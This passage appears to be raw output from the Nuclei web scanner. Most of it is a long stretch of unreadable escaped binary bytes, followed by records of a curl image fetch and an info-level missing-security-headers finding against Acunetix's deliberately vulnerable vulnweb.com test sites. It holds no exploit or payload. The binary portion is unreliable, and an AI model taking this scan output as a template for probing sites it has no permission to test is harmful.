\\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:42.216834676Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the 